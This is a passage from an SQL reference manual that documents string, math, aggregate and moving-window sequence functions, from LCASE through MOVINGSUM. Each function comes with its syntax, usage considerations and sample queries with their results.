string of\r\ncharacters to down-shift. See\r\n<<character_value_expressions,Character Value Expressions>>.\r\n\r\n[[examples_of_lcase]]\r\n=== Examples of LCASE\r\n\r\n* Suppose that your CUSTOMER table includes an entry for Hotel Oregon.\r\nSelect the column CUSTNAME and return in uppercase and lowercase letters\r\nby using the UCASE and LCASE functions:\r\n+\r\n```\r\nSELECT custname,UCASE(custname),LCASE(custname) FROM sales.customer;\r\n\r\n(EXPR) (EXPR) (EXPR)\r\n--------------- --------------------- ------------------\r\n... ... ...\r\nHotel Oregon HOTEL OREGON hotel oregon\r\n\r\n--- 17 row(s) selected.\r\n```\r\n+\r\nSee <<ucase_function,UCASE Function>>.\r\n\r\n<<<\r\n[[left_function]]\r\n=== LEFT Function\r\n\r\nThe LEFT function returns the leftmost specified number of characters\r\nfrom a character expression. Every character, including multi-byte\r\ncharacters, is treated as one character.\r\n\r\nLEFT is a {project-name} SQL extension.\r\n\r\n```\r\nLEFT (character-expr, count)\r\n```\r\n* `_character-expr_`\r\n+\r\nspecifies the source string from which to return the leftmost specified\r\nnumber of characters. The source string is an SQL character value expression.\r\nThe operand is the result of evaluating _character-expr_.\r\nSee <<character_value_expressions,Character Value Expressions>>.\r\n\r\n* `_count_`\r\n+\r\nspecifies the number of characters to return from _character-expr_.\r\nThe number count must be a value of exact numeric data type greater\r\nthan or equal to 0 with a scale of zero.\r\n\r\n[[examples_of_left]]\r\n=== Examples of LEFT\r\n\r\n* Return_'robert':\r\n+\r\n```\r\nleft('robert john smith', 6)\r\n```\r\n\r\n* Use the LEFT function to append the company name to the job\r\ndescriptions:\r\n+\r\n```\r\nUPDATE persnl.job SET jobdesc = LEFT (jobdesc, 11) ||' COMNET';\r\n\r\nSELECT jobdesc FROM persnl.job;\r\n\r\nJob Description\r\n------------------\r\nMANAGER COMNET\r\nPRODUCTION COMNET\r\nASSEMBLER COMNET\r\nSALESREP COMNET\r\nSYSTEM ANAL COMNET\r\nENGINEER COMNET\r\nPROGRAMMER COMNET\r\nACCOUNTANT COMNET\r\nADMINISTRAT COMNET\r\nSECRETARY COMNET\r\n\r\n--- 10 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[locate_function]]\r\n== LOCATE Function\r\n\r\nThe LOCATE function searches for a given substring in a character\r\nstring. If the substring is found, {project-name} SQL returns the character\r\nposition of the substring within the string. Every character, including\r\nmulti-byte characters, is treated as one character. The result returned\r\nby the LOCATE function is equal to the result returned by the\r\n<<position_function,Position Function>>.\r\n\r\nLOCATE is a {project-name} SQL extension.\r\n\r\n```\r\nLOCATE(substring-expression,source-expression)\r\n```\r\n\r\n* `_substring-expression_`\r\n+\r\nis an SQL character value expression that specifies the substring to\r\nsearch for in _source-expression_. The _substring-expression_ cannot be NULL.\r\nSee <<character_value_expressions,Character Value Expressions>>.\r\n\r\n* `_source-expression_`\r\n+\r\nis an SQL character value expression that specifies the source string.\r\nthe _source-expression_ cannot be null.\r\nSee <<character_value_expressions,Character Value Expressions>>.\r\n\r\n{project-name} SQL returns the result as a 2-byte signed integer with a scale\r\nof zero. If substring-expression is not found in source-expression , {project-name}\r\nSQL returns 0.\r\n\r\n[[considerations_for_locate]]\r\n=== Considerations for LOCATE\r\n\r\n[[result_of_locate]]\r\n==== Result of LOCATE\r\n\r\n* If the length of _source-expression_ is zero and the length of\r\n_substring-expression_ is greater than zero, {project-name} SQL returns 0.\r\n* If the length of _substring-expression_ is zero, {project-name} SQL returns 1.\r\n* If the length of _substring-expression_ is greater than the length of\r\n_source-expression_, {project-name} SQL returns 0.\r\n* If _source-expression_ is a null value, {project-name} SQL returns a null value.\r\n\r\n[[using_ucase]]\r\n==== Using UCASE\r\n\r\nTo ignore case in the search, use the UCASE function (or the LCASE\r\nfunction) for both the _substring-expression_ and the _source-expression_.\r\n\r\n[[examples_of_locate]]\r\n=== Examples of LOCATE\r\n\r\n* Return the value 8 for the position of the substring 'John' within the string:\r\n+\r\n```\r\nLOCATE ('John','Robert John Smith')\r\n```\r\n\r\n* Suppose that the EMPLOYEE table has an EMPNAME column that contains\r\nboth the first and last names. This SELECT statement returns all records\r\nin table EMPLOYEE that contain the substring 'SMITH', regardless of\r\nwhether the column value is in uppercase or lowercase characters:\r\n+\r\n```\r\nSELECT * FROM persnl.employee\r\nWHERE LOCATE ('SMITH',UCASE(empname)) > 0 ;\r\n```\r\n\r\n<<<\r\n[[log_function]]\r\n== LOG Function\r\n\r\nThe LOG function returns the natural logarithm of a numeric value\r\nexpression. LOG is a {project-name} SQL extension.\r\n\r\n```\r\nLOG (numeric-expression)\r\n```\r\n\r\n* `_numeric-expression_`\r\n+\r\nis an SQL numeric value expression that specifies the value for the\r\nargument of the LOG function. The value of the argument must be greater\r\nthan zero. See <<numeric_value_expressions>>.\r\n\r\n[[examples_of_log]]\r\n=== Examples of LOG\r\n\r\n* This function returns the value 6.93147180559945344e-001, or\r\napproximately 0.69315:\r\n+\r\n```\r\nLOG (2.0)\r\n```\r\n\r\n<<<\r\n[[log10_function]]\r\n=== LOG10 Function\r\n\r\nThe LOG10 function returns the base 10 logarithm of a numeric value\r\nexpression.\r\n\r\nLOG10 is a {project-name} SQL extension.\r\n\r\n```\r\nLOG10 (numeric-expression)\r\n```\r\n\r\n* `_numeric-expression_`\r\n+\r\nis an SQL numeric value expression that specifies the value for the\r\nargument of the LOG10 function. The value of the argument must be\r\ngreater than zero.\r\nSee <<numeric_value_expressions,Numeric Value Expressions>>.\r\n\r\n[[examples_of_log10]]\r\n=== Examples of LOG10\r\n\r\n* This function returns the value 1.39794000867203776E+000, or\r\napproximately 1.3979:\r\n+\r\n```\r\nLOG10 (25)\r\n```\r\n\r\n<<<\r\n[[lower_function]]\r\n== LOWER Function\r\n\r\nThe LOWER function down-shifts alphanumeric characters. For\r\nnon-alphanumeric characters, LOWER returns the same character. LOWER can\r\nappear anywhere in a query where a value can be used, such as in a\r\nselect list, an ON clause, a WHERE clause, a HAVING clause, a LIKE\r\npredicate, an expression, or as qualifying a new value in an UPDATE or\r\nINSERT statement. The result returned by the LOWER function is equal to\r\nthe result returned by the <<lcase_function,LCASE Function>>.\r\n\r\nLOWER returns a string of fixed-length or variable-length character\r\ndata, depending on the data type of the input string.\r\n\r\n```\r\nLOWER (character-expression)\r\n```\r\n\r\n* `_character-expression_`\r\n+\r\nis an SQL character value expression that specifies a string of\r\ncharacters to down-shift.\r\nSee <<character_value_expressions,Character Value Expressions>>.\r\n\r\n[[considerations_for_lower]]\r\n=== Considerations for LOWER\r\n\r\nFor a UTF8 character expression, the LOWER function down-shifts all the\r\nuppercase or title case characters in a given string to lowercase and\r\nreturns a character string with the same data type and character set as\r\nthe argument.\r\n\r\nA lower case character is a character that has the \"alphabetic\" property\r\nin Unicode Standard 2 whose Unicode name includes lower. An uppercase\r\ncharacter is a character that has the \"alphabetic\" property in the\r\nUnicode Standard 2 and whose Unicode name includes _upper_. A title\r\ncase character is a character that has the Unicode \"alphabetic\" property\r\nand whose Unicode name includes _title_.\r\n\r\n<<<\r\n[[examples_of_lower]]\r\n=== Examples of LOWER\r\n\r\n* Suppose that your CUSTOMER table includes an entry for Hotel Oregon.\r\nSelect the column CUSTNAME and return the result in uppercase and\r\nlowercase letters by using the UPPER and LOWER functions:\r\n+\r\n```\r\nSELECT custname,UPPER(custname),LOWER(custname) FROM sales.customer;\r\n\r\n(EXPR) (EXPR) (EXPR)\r\n----------------- ------------------- ---------------------\r\n... ... ...\r\nHotel Oregon HOTEL OREGON hotel oregon\r\n\r\n--- 17 row(s) selected.\r\n```\r\n\r\nSee <<upper_function,UPPER Function>>.\r\n\r\n<<<\r\n[[lpad_function]]\r\n=== LPAD Function\r\n\r\nThe LPAD function pads the left side of a string with the specified\r\nstring. Every character in the string, including multi-byte characters,\r\nis treated as one character.\r\n\r\nLPAD is a {project-name} SQL extension.\r\n\r\n```\r\nLPAD (str, len [,padstr])\r\n```\r\n\r\n* `_str_`\r\n+\r\ncan be an expression.\r\nSee <<character_value_expressions,Character Value Expressions>>.\r\n\r\n* `_len_`\r\n+\r\nidentifies the desired number of characters to be returned and can be an\r\nexpression but must be an integral value. If _len_ is equal to the\r\nlength of the string, no change is made. If _len_ is smaller than the\r\nstring size, the string is truncated.\r\n\r\n* `_pad-character_`\r\n+\r\ncan be an expression and may be a string.\r\n\r\n[[examples_of_lpad]]\r\n=== Examples of LPAD\r\n\r\n* This function returns ' kite':\r\n+\r\n```\r\nLPAD('kite', 7)\r\n```\r\n\r\n* This function returns 'ki':\r\n+\r\n```\r\nLPAD('kite', 2)\r\n```\r\n\r\n* This function returns '0000kite':\r\n+\r\n```\r\nLPAD('kite', 8, '0')\r\n```\r\n\r\n* This function returns 'go fly a kite':\r\n+\r\n```\r\nLPAD('go fly a kite', 13, 'z')\r\n```\r\n\r\n* This function returns 'John,John, go fly a kite'':\r\n+\r\n```\r\nLPAD('go fly a kite', 23, 'John,')\r\n```\r\n\r\n<<<\r\n[[ltrim_function]]\r\n== LTRIM Function\r\n\r\nThe LTRIM function removes leading spaces from a character string. If\r\nyou must remove any leading character other than space, use the TRIM\r\nfunction and specify the value of the character. See the <<trim_function,TRIM Function>>.\r\n\r\nLTRIM is a {project-name} SQL extension.\r\n\r\n```\r\nLTRIM (character-expression)\r\n```\r\n\r\n* `_character-expression_`\r\n+\r\nis an SQL character value expression and specifies the string from which\r\nto trim leading spaces.\r\nSee <<character_value_expressions,Character Value Expressions>>.\r\n\r\n[[considerations_for_ltrim]]\r\n=== Considerations for LTRIM\r\n\r\n[[result_of_ltrim]]\r\n==== Result of LTRIM\r\n\r\nThe result is always of type VARCHAR, with maximum length equal to the\r\nfixed length or maximum variable length of _character-expression_.\r\n\r\n[[examples_of_ltrim]]\r\n=== Examples of LTRIM\r\n\r\n* Return 'Robert ':\r\n+\r\n```\r\nLTRIM (' Robert ')\r\n```\r\n\r\nSee <<trim_function,TRIM Function>> and <<rtrim_function,RTRIM Function>>.\r\n\r\n<<<\r\n[[max_function]]\r\n== MAX\/MAXIMUM Function\r\n\r\nMAX is an aggregate function that returns the maximum value within a set\r\nof values. MAXIMUM is the equivalent of MAX wherever the function name\r\nMAX appears within a statement. The data type of the result is the same\r\nas the data type of the argument.\r\n\r\n```\r\nMAX | MAXIMUM ([ALL | DISTINCT] expression)\r\n```\r\n\r\n* `ALL | DISTINCT`\r\n+\r\nspecifies whether duplicate values are included in the computation of\r\nthe maximum of the _expression_. The default option is ALL, which\r\ncauses duplicate values to be included. If you specify DISTINCT,\r\nduplicate values are eliminated before the MAX\/MAXIMUM function is\r\napplied.\r\n\r\n* `_expression_`\r\n+\r\nspecifies an expression that determines the values to include in the\r\ncomputation of the maximum. The _expression_ cannot contain an aggregate\r\nfunction or a subquery. The DISTINCT clause specifies that the\r\nMAX\/MAXIMUM function operates on distinct values from the one-column\r\ntable derived from the evaluation of _expression_. All nulls are\r\neliminated before the function is applied to the set of values. If the\r\nresult table is empty, MAX\/MAXIMUM returns NULL.\r\nSee <<expressions,Expressions>>.\r\n\r\n[[considerations_for_max]]\r\n=== Considerations for MAX\/MAXIMUM\r\n\r\n[[operands_of_the_expression]]\r\n=== Operands of the Expression\r\n\r\nThe expression includes columns from the rows of the SELECT result table\r\nbut cannot include an aggregate function. These expressions are valid:\r\n\r\n```\r\nMAX (SALARY)\r\nMAX (SALARY * 1.1)\r\nMAX (PARTCOST * QTY_ORDERED)\r\n```\r\n\r\n[[examples_of_max]]\r\n=== Examples of MAX\/MAXIMUM\r\n\r\n* Display the maximum value in the SALARY column:\r\n+\r\n```\r\nSELECT MAX (salary) FROM persnl.employee;\r\n\r\n(EXPR)\r\n-----------\r\n 175500.00\r\n\r\n--- 1 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[md5_function]]\r\n== MD5 Function\r\n\r\nCalculates an MD5 128-bit checksum for the string. The value is returned\r\nas a string of 32 hexadecimal digits, or NULL if the argument was NULL. \r\n\r\n```\r\nMD5( _expression_)\r\n```\r\n* `_expression_`\r\n+\r\nspecifies an expression that determines the values to include in the\r\ncomputation of the MD5. The _expression_ cannot contain an aggregate\r\nfunction or a subquery. If the input value is NULL, MD5 returns NULL.\r\nSee <<expressions,Expressions>>.\r\n\r\n[[examples_of_md5]]\r\n=== Examples of MD5 \r\nThe return value is a nonbinary string in the connection character set.\r\n```\r\n>>SELECT MD5('testing') from dual;\r\n\r\n(EXPR)\r\n---------------------------------\r\n'ae2b1fca515949e5d54fb22b8ed95575'\r\n```\r\n\r\n<<<\r\n[[min_function]]\r\n== MIN Function\r\n\r\nMIN is an aggregate function that returns the minimum value within a set\r\nof values. The data type of the result is the same as the data type of\r\nthe argument.\r\n\r\n```\r\nMIN ([ALL | DISTINCT] _expression_)\r\n```\r\n\r\n* `ALL | DISTINCT`\r\n+\r\nspecifies whether duplicate values are included in the computation of\r\nthe minimum of the _expression_. The default option is ALL, which\r\ncauses duplicate values to be included. If you specify DISTINCT,\r\nduplicate values are eliminated before the MIN function is applied.\r\n\r\n* `_expression_`\r\n+\r\nspecifies an expression that determines the values to include in the\r\ncomputation of the minimum. The _expression_ cannot contain an aggregate\r\nfunction or a subquery. The DISTINCT clause specifies that the MIN\r\nfunction operates on distinct values from the one-column table derived\r\nfrom the evaluation of _expression_. All nulls are eliminated before\r\nthe function is applied to the set of values. If the result table is\r\nempty, MIN returns NULL.\r\nSee <<expressions,Expressions>>.\r\n\r\n[[considerations_for_min]]\r\n=== Considerations for MIN\r\n\r\n[[operands_of_the_expression_3]]\r\n==== Operands of the Expression\r\n\r\nThe expression includes columns from the rows of the SELECT result\r\ntable — but cannot include an aggregate function. These expressions are\r\nvalid:\r\n\r\n```\r\nMIN (SALARY)\r\nMIN (SALARY * 1.1)\r\nMIN (PARTCOST * QTY_ORDERED)\r\n```\r\n\r\n<<<\r\n[[examples_of_min]]\r\n=== Examples of MIN\r\n\r\n* Display the minimum value in the SALARY column:\r\n+\r\n```\r\nSELECT MIN (salary) FROM persnl.employee;\r\n\r\n(EXPR)\r\n-----------\r\n 17000.00\r\n\r\n--- 1 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[minute_function]]\r\n== MINUTE Function\r\n\r\nThe MINUTE function converts a TIME or TIMESTAMP expression into an\r\nINTEGER value, in the range 0 through 59, that represents the\r\ncorresponding minute of the hour.\r\n\r\nMINUTE is a {project-name} SQL extension.\r\n\r\n```\r\nMINUTE (datetime-expression)\r\n```\r\n\r\n* `_datetime-expression_`\r\n+\r\nis an expression that evaluates to a datetime value of type TIME or\r\nTIMESTAMP. See <<datetime_value_expressions,Datetime Value Expressions>>.\r\n\r\n[[examples_of_minute]]\r\n=== Examples of minute\r\n\r\n* Return an integer that represents the minute of the hour from the\r\nship timestamp column in the project table:\r\n+\r\n```\r\nSELECT start_date, ship_timestamp, MINUTE(ship_timestamp)\r\nFROM persnl.project\r\nWHERE projcode = 1000;\r\n\r\nStart\/Date Time\/Shipped (EXPR)\r\n---------- -------------------------- ------\r\n2008-04-10 2008-04-21 08:15:00.000000 15\r\n```\r\n\r\n<<<\r\n[[mod_function]]\r\n== MOD Function\r\n\r\nThe MOD function returns the remainder (modulus) of an integer value\r\nexpression divided by an integer value expression.\r\n\r\nMOD is a {project-name} SQL extension.\r\n\r\n```\r\nMOD (integer-expression-1,integer-expression-2)\r\n```\r\n\r\n* `_integer-expression-1_`\r\n+\r\nis an SQL numeric value expression of data type SMALLINT, INTEGER, or\r\nLARGEINT that specifies the value for the dividend argument of the MOD\r\nfunction.\r\n\r\n* `_integer-expression-2_`\r\n+\r\nis an SQL numeric value expression of data type SMALLINT, INTEGER, or\r\nLARGEINT that specifies the value for the divisor argument of the MOD\r\nfunction. The divisor argument cannot be zero.\r\nSee <<numeric_value_expressions,Numeric Value Expressions>>.\r\n\r\n[[examples_of_mod]]\r\n=== Examples of MOD\r\n\r\n* This function returns the value 2 as the remainder or modulus:\r\n+\r\n```\r\nMOD(11,3)\r\n```\r\n\r\n<<<\r\n[[month_function]]\r\n== MONTH Function\r\n\r\nThe MONTH function converts a DATE or TIMESTAMP expression into an\r\nINTEGER value in the range 1 through 12 that represents the\r\ncorresponding month of the year.\r\n\r\nMONTH is a {project-name} SQL extension.\r\n\r\n```\r\nMONTH (datetime-expression)\r\n```\r\n\r\n* `_datetime-expression_`\r\n+\r\nis an expression that evaluates to a datetime value of type DATE or\r\nTIMESTAMP. See <<datetime_value_expressions,Datetime Value Expressions>>.\r\n\r\n[[examples_of_month]]\r\n=== Examples of MONTH\r\n\r\n* Return an integer that represents the month of the year from the\r\nstart date column in the project table:\r\n+\r\n```\r\nSELECT start_date, ship_timestamp, MONTH(start_date) FROM persnl.project\r\nWHERE projcode = 1000;\r\n\r\nStart\/Date Time\/Shipped (EXPR)\r\n---------- -------------------------- ------\r\n2008-04-10 2008-04-21 08:15:00.000000 4\r\n```\r\n\r\n<<<\r\n[[monthname_function]]\r\n== MONTHNAME Function\r\n\r\nThe MONTHNAME function converts a DATE or TIMESTAMP expression into a\r\ncharacter literal that is the name of the month of the year (January,\r\nFebruary, and so on).\r\n\r\nMONTHNAME is a {project-name} SQL extension.\r\n\r\n```\r\nMONTHNAME (datetime-expression)\r\n```\r\n\r\n* `_datetime-expression_`\r\n+\r\nis an expression that evaluates to a datetime value of type DATE or\r\nTIMESTAMP. See <<datetime_value_expressions,Datetime Value Expressions>>.\r\n\r\n[[considerations_for_monthname]]\r\n=== Considerations for MONTHNAME\r\n\r\nThe MONTHNAME function returns the name of the month in ISO8859-1.\r\n\r\n[[examples_of_monthname]]\r\n=== Examples of MONTHNAME\r\n\r\n* Return a character literal that is the month of the year from the\r\nstart date column in the project table:\r\n+\r\n```\r\nSELECT start_date, ship_timestamp, MONTHNAME(start_date)\r\nFROM persnl.project\r\nWHERE projcode = 1000;\r\n\r\nStart\/Date Time\/Shipped (EXPR)\r\n---------- -------------------------- ---------\r\n2008-04-10 2008-04-21 08:15:00.000000 April\r\n```\r\n\r\n<<<\r\n[[movingavg_function]]\r\n== MOVINGAVG Function\r\n\r\nThe MOVINGAVG function is a sequence function that returns the average\r\nof non-null values of a column in the current window of an intermediate\r\nresult table ordered by a SEQUENCE BY clause in a SELECT statement. See\r\n<<sequence_by_clause,SEQUENCE BY Clause>>.\r\n\r\nMOVINGAVG is a {project-name} SQL extension.\r\n\r\n```\r\nMOVINGAVG(column-expression, integer-expression [, max-rows])\r\n```\r\n\r\n* `_column-expression_`\r\n+\r\nspecifies a derived column determined by the evaluation of the column\r\nexpression.\r\n\r\n* `_integer-expression_`\r\n+\r\nis an SQL numeric value expression of signed data type SMALLINT or\r\nINTEGER that specifies the current window. The current window is defined\r\nas the current row and the previous (_integer-expression_ - 1) rows.\r\n\r\n* `_max-rows_`\r\n+\r\nis an SQL numeric value expression of signed data type SMALLINT or\r\nINTEGER that specifies the maximum number of rows in the current window.\r\n\r\nNote these considerations for the window size:\r\n\r\n* The actual value for the window size is the minimum of\r\ninteger-_expression_ and _max-rows_.\r\n* If these conditions are met, MOVINGAVG returns the same result as\r\nRUNNINGAVG:\r\n** The _integer-expression_ is out of range, and _max-rows_ is not\r\nspecified. This condition includes the case in which both\r\n_integer-expression_ and _max-rows_ are larger than the result table.\r\n** The minimum of _integer-expression_ and _max-rows_ is out of range.\r\nIn this case, _integer-expression_ could be within range, but _max-rows_\r\nmight be the minimum value of the two and be out of range (for example,\r\na negative number).\r\n* The number of rows is out of range if it is larger than the size of\r\nthe result table, negative, or NULL.\r\n\r\n<<<\r\n[[examples_of_movingavg]]\r\n=== Examples of MOVINGAVG\r\n\r\n* Return the average of non-null values of a column in the current window\r\nof three rows:\r\n+\r\n```\r\nCREATE TABLE db.mining.seqfcn (I1 INTEGER, ts TIMESTAMP);\r\n\r\nSELECT MOVINGAVG (I1,3) AS MOVINGAVG3\r\nFROM mining.seqfcn SEQUENCE BY ts;\r\n\r\nI1 TS\r\n6215 TIMESTAMP '1950-03-05 08:32:09'\r\n28174 TIMESTAMP '1951-02-15 14:35:49'\r\nnull TIMESTAMP '1955-05-18 08:40:10'\r\n4597 TIMESTAMP '1960-09-19 14:40:39'\r\n11966 TIMESTAMP '1964-05-01 16:41:02'\r\n\r\nMOVINGAVG3\r\n---------------------\r\n 6215\r\n 17194\r\n 17194\r\n 16385\r\n 8281\r\n\r\n--- 5 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[movingcount_function]]\r\n== MOVINGCOUNT Function\r\n\r\nThe MOVINGCOUNT function is a sequence function that returns the number\r\nof non-null values of a column in the current window of an intermediate\r\nresult table ordered by a SEQUENCE BY clause in a SELECT statement. See\r\n<<sequence_by_clause,SEQUENCE BY Clause>>.\r\n\r\nMOVINGCOUNT is a {project-name} SQL extension.\r\n\r\n```\r\nMOVINGCOUNT (column-expression, integer-expression [, max-rows])\r\n```\r\n* `_column-expression_`\r\n+\r\nspecifies a derived column determined by the evaluation of the column\r\nexpression.\r\n\r\n* `_integer-expression_`\r\n+\r\nis an SQL numeric value expression of signed data type SMALLINT or\r\nINTEGER that specifies the current window. The current window is defined\r\nas the current row and the previous (_integer-expression_ - 1) rows.\r\n\r\n* `_max-rows_`\r\n+\r\nis an SQL numeric value expression of signed data type SMALLINT or\r\nINTEGER that specifies the maximum number of rows in the current window.\r\n\r\nNote these considerations for the window size:\r\n\r\n* The actual value for the window size is the minimum of\r\n_integer-expression_ and _max-rows_.\r\n* If these conditions are met, MOVINGCOUNT returns the same result as\r\nRUNNINGCOUNT:\r\n** The _integer-expression_ is out of range, and _max-rows_ is not\r\nspecified. This condition includes the case in which both\r\n_integer-expression_ and _max-rows_ are larger than the result table.\r\n** The minimum of _integer-expression_ and _max-rows_ is out of range.\r\nIn this case, _integer-expression_ could be within range, but _max-rows_\r\nmight be the minimum value of the two and be out of range (for example,\r\na negative number).\r\n* The number of rows is out of range if it is larger than the size of\r\nthe result table, negative, or NULL.\r\n\r\n<<<\r\n[[considerations_for_movingcount]]\r\n=== Considerations for MOVINGCOUNT\r\n\r\nThe MOVINGCOUNT sequence function is defined differently from the COUNT\r\naggregate function. If you specify DISTINCT for the COUNT aggregate\r\nfunction, duplicate values are eliminated before COUNT is applied. You\r\ncannot specify DISTINCT for the MOVINGCOUNT sequence function; duplicate\r\nvalues are counted.\r\n\r\n[[examples_of_movingcount]]\r\n=== Examples of MOVINGCOUNT\r\n\r\n* Return the number of non-null values of a column in the current window of\r\nthree rows:\r\n+\r\n```\r\nSELECT MOVINGCOUNT (I1,3) AS MOVINGCOUNT3\r\nFROM mining.seqfcn SEQUENCE BY ts;\r\n\r\nMOVINGCOUNT3\r\n------------\r\n 1\r\n 2\r\n 2\r\n 2\r\n 2\r\n\r\n--- 5 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[movingmax_function]]\r\n== MOVINGMAX Function\r\n\r\nThe MOVINGMAX function is a sequence function that returns the maximum\r\nof non-null values of a column in the current window of an intermediate\r\nresult table ordered by a SEQUENCE BY clause in a SELECT statement. See\r\n<<sequence_by_clause,SEQUENCE BY Clause>>.\r\n\r\nMOVINGMAX is a {project-name} SQL extension.\r\n\r\n```\r\nMOVINGMAX (column-expression, integer-expression [, max-rows])\r\n```\r\n\r\n* `_column-expression_`\r\n+\r\nspecifies a derived column determined by the evaluation of the column\r\nexpression.\r\n\r\n* `_integer-expression_`\r\n+\r\nis an SQL numeric value expression of signed data type SMALLINT or\r\nINTEGER that specifies the current window. The current window is defined\r\nas the current row and the previous (_integer-expression_ - 1) rows.\r\n\r\n* `_max-rows_`\r\n+\r\nis an SQL numeric value expression of signed data type SMALLINT or\r\nINTEGER that specifies the maximum number of rows in the current window.\r\n\r\nNote these considerations for the window size:\r\n\r\n* The actual value for the window size is the minimum of\r\n_integer-expression_ and _max-rows_.\r\n* If these conditions are met, MOVINGMAX returns the same result as\r\nRUNNINGMAX:\r\n** The _integer-expression_ is out of range, and _max-rows_ is not\r\nspecified. This condition includes the case in which both\r\n_integer-expression_ and _max-rows_ are larger than the result table.\r\n** The minimum of _integer-expression_ and _max-rows_ is out of range.\r\nIn this case, _integer-expression_ could be within range, but _max-rows_\r\nmight be the minimum value of the two and be out of range (for example,\r\na negative number).\r\n* The number of rows is out of range if it is larger than the size of\r\nthe result table, negative, or NULL.\r\n\r\n<<<\r\n[[examples_of_movingmax]]\r\n=== Examples of MOVINGMAX\r\n\r\n* Return the maximum of non-null values of a column in the current window\r\nof three rows:\r\n+\r\n```\r\nSELECT MOVINGMAX (I1,3) AS MOVINGMAX3\r\nFROM mining.seqfcn SEQUENCE BY ts;\r\n\r\nMOVINGMAX3\r\n------------\r\n 6215\r\n 28174\r\n 28174\r\n 28174\r\n 11966\r\n\r\n--- 5 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[movingmin_function]]\r\n== MOVINGMIN Function\r\n\r\nThe MOVINGMIN function is a sequence function that returns the minimum\r\nof non-null values of a column in the current window of an intermediate\r\nresult table ordered by a SEQUENCE BY clause in a SELECT statement. See\r\n<<sequence_by_clause,SEQUENCE BY Clause>>.\r\n\r\nMOVINGMIN is a {project-name} SQL extension.\r\n\r\n```\r\nMOVINGMIN (column-expression, integer-expression [, max-rows])\r\n```\r\n\r\n* `_column-expression_`\r\n+\r\nspecifies a derived column determined by the evaluation of the column\r\nexpression.\r\n\r\n* `_integer-expression_`\r\n+\r\nis an SQL numeric value expression of signed data type SMALLINT or\r\nINTEGER that specifies the current window. The current window is defined\r\nas the current row and the previous (_integer-expression_ - 1) rows.\r\n\r\n* `_max-rows_`\r\n+\r\nis an SQL numeric value expression of signed data type SMALLINT or\r\nINTEGER that specifies the maximum number of rows in the current window.\r\n\r\nNote these considerations for the window size:\r\n\r\n* The actual value for the window size is the minimum of\r\n_integer-expression_ and _max-rows_.\r\n* If these conditions are met, MOVINGMIN returns the same result as\r\nRUNNINGMIN:\r\n** The _integer-expression_ is out of range, and _max-rows_ is not\r\nspecified. This condition includes the case in which both\r\n_integer-expression_ and _max-rows_ are larger than the result table.\r\n** The minimum of _integer-expression_ and _max-rows_ is out of range.\r\nIn this case, _integer-expression_ could be within range, but _max-rows_\r\nmight be the minimum value of the two and be out of range (for example,\r\na negative number).\r\n* The number of rows is out of range if it is larger than the size of\r\nthe result table, negative, or NULL.\r\n\r\n<<<\r\n[[examples_of_movingmin]]\r\n=== Examples of MOVINGMIN\r\n\r\n* Return the minimum of non-null values of a column in the current window\r\nof three rows:\r\n+\r\n```\r\nSELECT MOVINGMIN (I1,3) AS MOVINGMIN3\r\nFROM mining.seqfcn SEQUENCE BY ts;\r\n\r\nMOVINGMIN3\r\n------------\r\n 6215\r\n 6215\r\n 6215\r\n 4597\r\n 4597\r\n\r\n--- 5 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[movingstddev_function]]\r\n== MOVINGSTDDEV Function\r\n\r\nThe MOVINGSTDDEV function is a sequence function that returns the\r\nstandard deviation of non-null values of a column in the current window\r\nof an intermediate result table ordered by a SEQUENCE BY clause in a\r\nSELECT statement. See <<sequence_by_clause,SEQUENCE BY Clause>>.\r\n\r\nMOVINGSTDDEV is a {project-name} SQL extension.\r\n\r\n```\r\nMOVINGSTDDEV (column-expression, integer-expression [, max-rows])\r\n```\r\n\r\n* `_column-expression_`\r\n+\r\nspecifies a derived column determined by the evaluation of the column\r\nexpression.\r\n\r\n* `_integer-expression_`\r\n+\r\nis an SQL numeric value expression of signed data type SMALLINT or\r\nINTEGER that specifies the current window. The current window is defined\r\nas the current row and the previous (_integer-expression_ - 1) rows.\r\n\r\n* `_max-rows_`\r\n+\r\nis an SQL numeric value expression of signed data type SMALLINT or\r\nINTEGER that specifies the maximum number of rows in the current window.\r\n\r\nNote these considerations for the window size:\r\n\r\n* The actual value for the window size is the minimum of\r\n_integer-expression_ and _max-rows_.\r\n* If these conditions are met, MOVINGSTDDEV returns the same result as\r\nRUNNINGSTDDEV:\r\n** The _integer-expression_ is out of range, and _max-rows_ is not\r\nspecified. This condition includes the case in which both\r\n_integer-expression_ and _max-rows_ are larger than the result table.\r\n** The minimum of _integer-expression_ and _max-rows_ is out of range.\r\nIn this case, _integer-expression_ could be within range, but _max-rows_\r\nmight be the minimum value of the two and be out of range (for example,\r\na negative number).\r\n* The number of rows is out of range if it is larger than the size of\r\nthe result table, negative, or NULL.\r\n\r\n<<<\r\n[[examples_of_movingstddev]]\r\n=== Examples of MOVINGSTDDEV\r\n\r\n* Return the standard deviation of non-null values of a column in the\r\ncurrent window of three rows:\r\n+\r\n```\r\nSELECT MOVINGSTDDEV (I1,3) AS MOVINGSTDDEV3\r\nFROM mining.seqfcn SEQUENCE BY ts;\r\n\r\nMOVINGSTDDEV3\r\n-------------------------\r\n 0.00000000000000000E+000\r\n 1.55273578080753976E+004\r\n 1.48020166531456112E+004\r\n 1.51150124820766640E+004\r\n 6.03627542446499008E+003\r\n\r\n--- 5 row(s) selected.\r\n```\r\n\r\n* You can use the CAST function for display purposes. For example:\r\n+\r\n```\r\nSELECT CAST(MOVINGSTDDEV (I1,3) AS DEC (18,3))\r\nFROM mining.seqfcn SEQUENCE BY ts;\r\n\r\n(EXPR)\r\n--------------------\r\n .000\r\n 15527.357\r\n 14802.016\r\n 15115.012\r\n 6036.275\r\n\r\n--- 5 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[movingsum_function]]\r\n== MOVINGSUM Function\r\n\r\nThe MOVINGSUM function is a sequence function that returns the sum of\r\nnon-null values of a column in the current window of an intermediate\r\nresult table ordered by a SEQUENCE BY clause in a SELECT statement. See\r\n<<sequence_by_clause,SEQUENCE BY Clause>>.\r\n\r\nMOVINGSUM is a {project-name} SQL extension.\r\n\r\n```\r\nMOVINGSUM (column-expression, integer-expression [, max-rows])\r\n```\r\n\r\n* `_column-expression_`\r\n+\r\nspecifies a derived column determined 